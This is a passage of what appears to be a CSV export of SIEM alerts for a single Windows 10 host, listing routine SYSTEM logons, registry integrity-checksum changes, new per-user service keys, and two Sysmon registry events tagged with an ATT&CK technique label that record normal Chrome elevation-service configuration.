+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:28:28.128",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3ea3f' was added. +", +"Apr 24, 2020 @ 10:28:28.112",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:28:26.425",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '39324a091e8e394cfa0881ee3414520b' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'fa56f0ef6e21e4f64af4ae07bada3b859656ac2b' +", +"Apr 24, 2020 @ 10:28:26.410",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '3ab42836b91eda6d7a737f85db75cc0f' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '3e85e472ca462ac01899caabb6d29f1f7cf46732' +", +"Apr 24, 2020 @ 10:28:20.927",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '2d06df654a5682deb631986d5e100e06' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : 'fad4ff695b75db7b46758e17f337de0152aa22a4' +", +"Apr 24, 2020 @ 10:28:20.914",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. 
+Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '0507a05dac0cb01533bea9c7856dd320' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'be87be8572a241e55153e65f30b0e97ba6d756d2' +", +"Apr 24, 2020 @ 10:28:20.322",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '7b25497674cc671619a3e52c5a6b72e8' +New md5sum is : 'c361117616a05d4278b52bebd6da3141' +Old sha1sum was: 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +New sha1sum is : 'ec1bd80ed1806a52ea2bf63712d2625626a71bc5' +", +"Apr 24, 2020 @ 10:28:19.928",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. 
The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:28:19.819",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. 
It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:28:18.100",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '544514e57047c2570309981465630650' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '806ec5bc628010b8292a8f9a147a3c4e5f55b8d7' +", +"Apr 24, 2020 @ 10:28:15.943",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. 
+Old md5sum was: '73ff3da5b491b534e4f1fca73d797712' +New md5sum is : '6c9fa8f349691cfc6474afbfb85a26d0' +Old sha1sum was: '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +New sha1sum is : 'cf2a4ead8cc286234f64909716907d8e036d500a' +", +"Apr 24, 2020 @ 10:28:15.724",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:28:15.708",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:28:15.068",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'd73c739d94aff99e2de6c480608f2631' +New md5sum is : '8ac497b048ccef73c4ecb361aa3ffac8' +Old sha1sum was: 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +New sha1sum is : 'a57ddc3084097c99fcffcfb1e624035b13112910' +", +"Apr 24, 2020 @ 10:28:14.912",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '057b39f9a279a74ae6e39c10634a6eab' +New md5sum is : '963ffd284ab17477c4d656c4f2614c4f' +Old sha1sum was: 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +New sha1sum is : 'c0ea9cb87fbded9044c0d4731c687543eb23962a' +", +"Apr 24, 2020 @ 10:28:14.436",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:28:14.398",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:28:14.193",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '544514e57047c2570309981465630650' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '806ec5bc628010b8292a8f9a147a3c4e5f55b8d7' +", +"Apr 24, 2020 @ 10:28:13.164",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +", +"Apr 24, 2020 @ 10:28:11.663",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : '330657157ba5cc04171b1c1a81722e90' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : 'acb2fba9bf89d2a3d54e7e057478f4c44fa08b81' +", +"Apr 24, 2020 @ 10:28:07.789",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. 
+Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 24, 2020 @ 10:28:06.915",5,"Windows System error event",,"""The server {0134A8B2-3407-4B45-AD25-E9F7C92A80BC} did not register with DCOM within the required timeout.""" +"Apr 24, 2020 @ 10:28:06.226",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:28:03.912026900Z"",""eventRecordID"":""921"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:28:03.899\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath\r\nDetails: \""C:\\Program Files (x86)\\Google\\Chrome\\Application\\81.0.4044.122\\elevation_service.exe\""\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:28:03.899"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\ImagePath"",""details"":""\\\""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\81.0.4044.122\\\\elevation_service.exe\\\""""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue 
+UtcTime: 2020-04-24 10:28:03.899 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath +Details: ""C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.122\elevation_service.exe""""" +"Apr 24, 2020 @ 10:28:06.211",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:28:03.911809700Z"",""eventRecordID"":""920"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:28:03.899\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:28:03.899"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:28:03.899 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\Start +Details: DWORD 
(0x00000003)""" +"Apr 24, 2020 @ 10:28:05.189",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 24, 2020 @ 10:28:05.184",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '5b91e535422785d7409df5362ceec530' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : '4e27ba555e6d427aef066e320154eafec1fd64e2' +", +"Apr 24, 2020 @ 10:28:02.587",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T10:25:00Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:28:00.635",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +", +"Apr 24, 2020 @ 10:27:58.479",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:58.465",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:57.979",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ea3f' was added. 
+", +"Apr 24, 2020 @ 10:27:57.964",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:53.996",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:53.980",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:53.417",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '774e15e7baf44381d722db864ab890d7' +New md5sum is : '50e564d651df4ed3711c530cb99d635a' +Old sha1sum was: '469daffaef7546bd68eba730d238e5592de9f468' +New sha1sum is : '9f85b67a6c52e8312f838e2577ad0927a069eeda' +", +"Apr 24, 2020 @ 10:27:51.372",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '994c45f15282cc5a92f237967d96fef5' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '88530f962585446daf77f46e080d8b08c8e98a2c' +", +"Apr 24, 2020 @ 10:27:49.809",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '71d14a2d2a756124273e36b0738f8bba' +New md5sum is : '4eb2a07540b08107a0625ee3e4611bbc' +Old sha1sum was: 'c605e5d23f62dcaf8235115a11a8363912e96ea2' +New sha1sum is : '343b58bbd290264a88f73a3bbfdb8c0877c5bb8e' +", +"Apr 24, 2020 @ 10:27:48.622",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'b4bce65b22aa4a519547960a719662c4' +New md5sum is : 'fcd2bde063d08e3e493bd9b171932f62' +Old sha1sum was: '3dac9d974e4d5d554b03c5e46ca8acc22b4826b6' +New sha1sum is : '0154114214c1947389b713ef77c27205b797facc' +", +"Apr 24, 2020 @ 10:27:48.502",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:48.496",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ea3f\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 10:27:48.468",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:44.455",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'df3256a25e140f891367ef4f45e45db2' +New md5sum is : 'a836bd80394300540414e863397687ad' +Old sha1sum was: 'e2d4eee52f1f6550a2d64d496dfa6aa49e9a8351' +New sha1sum is : '10c4d918d67affeb805f43db3431644b1b028a63' +", +"Apr 24, 2020 @ 10:27:43.081",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '735c3ab6e8ca71e23614002bbb028249' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : 'd5a88f2cb188c5047330cafcb78ced9235190617' +", +"Apr 24, 2020 @ 10:27:40.408",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '1f47b7195d8fed9969326bd01db47d06' +New md5sum is : '27f0b0536743e3de8fcd99c86a2544f2' +Old sha1sum was: 'ee63ae916c97b341f744e3bde4a840cc48ac014b' +New sha1sum is : '735e4f181b67d19525042b6d7dd870ffedcd3c0c' +", +"Apr 24, 2020 @ 10:27:39.767",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : 'e72eae0fec329e0227c0acc6aad332c2' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '2b49b1970c5bb2cfdd9508be50951510ea0093de' +", +"Apr 24, 2020 @ 10:27:38.656",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 24, 2020 @ 10:27:34.144",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:27:29.269",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '8ef26438ac25bee10003522daa8b4a2f' +New md5sum is : '7fc797b070d280459f0f0868feba447f' +Old sha1sum was: 'b211ed5eee8285bb054c42335a4a0a9b2c9385b0' +New sha1sum is : '9d42eab457bdc2cad562af5e5592589017817080' +", +"Apr 24, 2020 @ 10:27:23.115",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '0ec8c5bab58c4b05da4b48fa2c3bf9b5' +New md5sum is : '06c8ea1070e2b835ca012b5cda7256cf' +Old sha1sum was: '453d1c5c9c77e01007afa63ba0bb33db3da2ef96' +New sha1sum is : '565d2cad6cc817059329e58613803ea2e1c50563' +", +"Apr 24, 2020 @ 10:27:21.651",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:21.634",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:21.559",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:21.538",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:21.257",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ea3f' was added. 
+", +"Apr 24, 2020 @ 10:27:21.242",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:20.632",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:20.601",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:20.481",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:20.462",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:20.320",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '544514e57047c2570309981465630650' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '806ec5bc628010b8292a8f9a147a3c4e5f55b8d7' +", +"Apr 24, 2020 @ 10:27:19.397",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 10:27:18.913",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:18.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:18.742",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3ea3f' was added. 
